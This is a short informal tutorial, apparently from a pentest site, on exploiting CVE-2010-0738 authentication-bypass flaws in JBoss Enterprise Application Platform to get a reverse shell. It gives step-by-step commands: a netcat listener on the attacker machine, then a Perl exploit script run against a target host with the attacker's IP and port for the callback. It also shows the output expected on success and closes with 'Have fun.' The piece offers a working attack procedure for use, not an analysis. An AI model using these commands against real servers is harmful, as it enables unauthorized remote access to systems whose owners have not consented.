CVE: CVE-2010-0738
Remote: Yes
Local: No
URL with details on the vulnerability and the exploit download: http://www.securityfocus.com/bid/39710/info
JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions to obtain sensitive information or gain unauthorized access to the application.
OK, now let's rock and roll!
1) Open 2 shells on your BackTrack or other pentest machine.
2) In the first one, prepare your pentest server to receive the connection back from the target machine by typing in this shell: nc -l -p 8000 -vvv
3) Now, in the other shell, run the exploit: perl jboss.pl mytargettest.com 8080 172.16.1.79 8000 lnx
If you see this in the exploit shell, it means it worked!
UPLOAD... SUCCESS
EXECUTE
SUCCESS
Now go to your other shell and you should have your reverse shell connected!
Have fun.